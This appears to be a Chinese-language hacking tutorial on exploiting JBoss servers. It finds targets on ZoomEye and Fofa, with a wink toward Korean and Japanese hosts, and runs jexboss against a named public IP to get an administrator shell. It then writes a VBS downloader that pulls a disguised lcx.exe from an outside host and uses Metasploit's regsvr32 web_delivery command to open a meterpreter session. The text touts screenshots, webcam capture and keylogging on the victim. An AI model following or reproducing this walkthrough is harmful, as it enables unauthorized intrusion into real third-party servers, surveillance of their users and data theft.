jboss漏洞利用

JBOSS

JBoss应用服务器（JBoss AS）是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件（JEMS）的一部分，并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的，导致了它很很复杂，同时也使它易成为攻击者的目标。

使用工具

msf，jexboss，zoomeye，fofa

下载jexboss

在github中搜索jexboss下载漏洞利用代码

还可以在kali中直接下载

git clone https://github.com/joaomatosf/jexboss.git #获取jexboss工具

搜索目标机

利用zoomeye搜索符合要求的ip

还可以通过fofa搜索

注意最好是用8080端口，国家是韩国或者日本，你懂的

找这个有用的网站，有一个小技巧，访问了很多网站，发现出现这个页面时，很可能出现漏洞

利用jexboss进行攻击

刚刚下载了jexboss是一个文件夹，在命令行中进入到文件中

通过阅读readme文件，查看使用方法，先安装模板

pip install -r requires.txt

执行jexboss.py文件，拿到shell

python jexboss.py -host http://188.125.99.58:8080/

中间有一个输入yes的操作，拿到的shell还是管理员权限

使用命令ipconfig，发现是内网ip，不能远程连接3389

想通过端口转发的方式，将内网3389端口转发到公网ip的端口上，于是上传端口转发的工具lcx.exe

这里有一种方法，下载文件，通过执行vbs文件下载，其实通过ftp下载更为简单

逐条写入以下代码

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >> dc.vbs   
echo xPost.Open "GET","http://45.32.62.186/lcx.txt",0 >> dc.vbs 
echo xPost.Send() >> dc.vbs 
echo Set sGet = CreateObject("ADODB.Stream") >> dc.vbs   
echo sGet.Mode = 3 >> dc.vbs 
echo sGet.Type = 1 >> dc.vbs   
echo sGet.Open() >> dc.vbs   
echo sGet.Write(xPost.responseBody) >> dc.vbs  
echo sGet.SaveToFile "C:/PACS/dcm4chee-mysql-2.14.5/bin/lcx.txt",2 >> dc.vbs 

先在公网上放了lcx文件，由于exe文件不能下载，所以将其改为txt文件，最后一条的路径为目标机的绝对路径

写好之后，查看以下是否写入成功

type dc.vbs

然后执行vbs

dc.vbs

文件下载好了，将txt后缀改为exe

ren lcx.txt lcx.exe

但是我执行lcx.exe失败了，没有回显信息，于是有了另一种强大的方法

利用vps的msf监控目标机

做这一个步骤，需要你有一个vps和公网ip，vps中安装了msf

msf中有一个模块web_delivery，针对windows7及以上的系统，通杀，超级强大

msfconsole  #打开msf的命令行界面
search web_delivery #搜索这个模块
use exploit/windows/misc/regsvr32_applocker_bypass_server #使用这个模块
show options #查看所需参数
set LHOST 192.168.1.190 #设置本机ip
exploit #开始攻击

成功之后会返回一条命令

regsvr32 /s /n /u /i:http://192.168.1.190:8080/TCSB0HE.sct scrobj.dll

将这条命令，在目标机的shell中运行

vps就会监听到目标机，看到新建了回话，ctrl+c

输入命令

sessions -i 1

拿到msf的最高权限meterpreter，可以输入help查看帮助文档，也可以输入shell，执行目标机的系统命令

meterpreter可以截屏，可以开启摄像头，可以记录键盘，很多强大的功能，在help中都能看到

截图命令：screenshot